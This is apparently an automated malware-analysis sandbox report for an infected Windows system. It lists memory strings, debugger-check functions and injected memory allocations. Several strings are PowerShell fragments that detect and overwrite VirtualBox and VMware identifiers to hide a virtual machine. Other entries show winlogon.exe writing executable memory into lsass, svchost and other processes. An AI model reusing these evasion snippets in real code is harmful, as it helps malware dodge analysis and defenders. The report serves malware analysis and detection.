        Source: svchost.exe, 0000001B.00000002.2542887231.00000220C1FC0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
        Source: svchost.exe, 0000001B.00000003.1559216705.00000220C2B63000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec98
        Source: svchost.exe, 0000001B.00000003.1569383311.00000220C2AFD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: LSI_SASVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
        Source: svchost.exe, 0000001B.00000000.1547745616.00000220C2095000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMCI: Using capabilities (0x1c).
        Source: svchost.exe, 0000001B.00000002.2542887231.00000220C1FC0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
        Source: svchost.exe, 0000001B.00000003.1569383311.00000220C2AFD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicNECVMWarVMware SATA CD00
        Source: svchost.exe, 0000001B.00000003.1559216705.00000220C2B63000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
        Source: dwm.exe, 00000014.00000000.1510270449.000001F084360000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000<
        Source: dwm.exe, 00000014.00000002.2623511092.000001F084445000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: r&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: svchost.exe, 0000001B.00000003.1564036317.00000220C2C03000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware
        Source: svchost.exe, 0000001B.00000000.1551921933.00000220C4222000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
        Source: svchost.exe, 0000001B.00000002.2542887231.00000220C1FC0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
        Source: svchost.exe, 0000001B.00000003.1569383311.00000220C2AFD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
        Source: svchost.exe, 0000001B.00000002.2542887231.00000220C1FC0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
        Source: cmd.exe, 00000004.00000003.1289777984.000001B78052C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1289657081.000001B78052C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: zTCOwOEjxFMJEbQFKATqemUKLcOcbAhSJRrXHEhjJSKt
        Source: svchost.exe, 0000001B.00000000.1548692511.00000220C2A60000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: dowvmciW
        Source: lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicvssNT SERVICE
        Source: svchost.exe, 0000001B.00000003.1559216705.00000220C2B63000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
        Source: svchost.exe, 00000013.00000000.1502713594.000001E89FE2A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@H
        Source: svchost.exe, 0000001B.00000003.1563663431.00000220C2BAB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
        Source: svchost.exe, 0000001B.00000003.1569383311.00000220C2AFD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: storahciNECVMWarVMware SATA CD00
        Source: lsass.exe, 00000012.00000000.1499622184.000002158A013000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2532164711.000002158A013000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1502675685.000001E89FE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2511771248.000001E89FE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1529397112.000001478602B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2520664001.000001478602B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2504955179.000001DC5962A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1530485321.000001DC5962A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1533680006.0000016587E41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2522479942.0000016587E41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2549732991.00000220C2037000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicshutdownNT SERVICE
        Source: svchost.exe, 0000001B.00000003.1573742854.00000220C4585000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk 2.0 6000c29c2bea38880a8a16ee9f37bec9PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
        Source: svchost.exe, 0000001B.00000002.2542887231.00000220C1FC0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
        Source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: DisableGuestVmNetworkConnectivity
        Source: svchost.exe, 00000024.00000000.1595581623.0000019104A02000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
        Source: lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicheartbeatNT SERVICE
        Source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: EnableGuestVmNetworkConnectivity
        Source: svchost.exe, 0000001B.00000002.2542887231.00000220C1FC0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
        Source: dwm.exe, 00000014.00000000.1510270449.000001F084360000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: svchost.exe, 0000001B.00000000.1547344289.00000220C1FA0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk2.06000c29c2bea38880a8a16ee9f37bec9PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
        Source: C:\Windows\System32\cmd.exe | Code function: 4_2_000001B780BE9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000001B780BE9490
        Source: C:\Windows\System32\cmd.exe | Code function: 4_2_000001B780BE175C GetProcessHeap,HeapAlloc,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegCloseKey,4_2_000001B780BE175C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\winlogon.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\cmd.exe | Code function: 4_2_000001B780BE9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000001B780BE9490
        Source: C:\Windows\System32\cmd.exe | Code function: 4_2_000001B780BE97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_000001B780BE97F4
        Source: C:\Windows\System32\cmd.exe | Code function: 4_2_000001B780BEDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000001B780BEDD1C
        Source: C:\Windows\System32\conhost.exe | Code function: 5_2_000002640732DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000002640732DD1C
        Source: C:\Windows\System32\conhost.exe | Code function: 5_2_00000264073297F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00000264073297F4
        Source: C:\Windows\System32\conhost.exe | Code function: 5_2_0000026407329490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0000026407329490
        Source: C:\Windows\System32\more.com | Code function: 16_2_00000234FE5297F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00000234FE5297F4
        Source: C:\Windows\System32\more.com | Code function: 16_2_00000234FE529490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000234FE529490
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE52DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000234FE52DD1C
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEE97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_000002158AEE97F4
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEEDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002158AEEDD1C
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEE9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002158AEE9490
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01ADD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001E8A01ADD1C
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01A97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_000001E8A01A97F4
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01A9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001E8A01A9490
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F088949490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000001F088949490
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F0889497F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_000001F0889497F4
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F08894DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000001F08894DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F797F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_000001AC86F797F4
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F7DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001AC86F7DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F79490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001AC86F79490
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FBDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000014785FBDD1C
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FB9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000014785FB9490
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FB97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_0000014785FB97F4
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D197F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_000001DC59D197F4
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D1DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001DC59D1DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D19490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001DC59D19490
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BCDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_0000016588BCDD1C
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BC9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_0000016588BC9490
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BC97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_0000016588BC97F4
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D3497F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_0000017A8D3497F4
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D349490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000017A8D349490
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D34DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000017A8D34DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8BDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001F34D8BDD1C
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8B9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001F34D8B9490
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8B97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_000001F34D8B97F4
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C2709490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00000220C2709490
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00000220C270DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C27097F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00000220C27097F4
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E99490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0000025AF1E99490
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E997F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0000025AF1E997F4
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0000025AF1E9DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0000027BFFD3DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD39490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0000027BFFD39490
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD397F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_0000027BFFD397F4
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE0599490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000001CEE0599490
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000001CEE059DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE05997F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_000001CEE05997F4
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001B12B39DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B3997F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_000001B12B3997F4
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B399490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001B12B399490

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\System32\svchost.exe | Domain query: ipwho.is
        Source: C:\Windows\System32\svchost.exe | Domain query: c.pki.goog
        Source: Yara match | File source: amsi64_3316.amsi.csv, type: OTHER
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 2158AEB0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1E89FDC0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 1F088910000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1AC86F40000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 14785F80000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1DC59CE0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 16588B90000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 17A8CDB0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F34D880000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 220C26D0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 25AF1E60000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 27BFF5C0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1CEE0560000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B12B360000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D16AC90000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 244678A0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 183B0DA0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1805B940000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 191051C0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1BD35360000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 21C3D9B0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 12411140000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2D66E190000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 25F19560000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1BCA63A0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1E8FB3B0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F30F940000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 19CDA5A0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\spoolsv.exe base: 6E0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1A5F41B0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 27B14120000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1BCB8350000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 17A379A0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 250F1D60000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 11DEF540000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 23B351A0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1CA9F190000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D56C5D0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1E5CF260000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B558CB0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 17A21740000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 20FA22F0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1CD4E000000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 17B78700000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22EB7B30000 protect: page execute and read and write
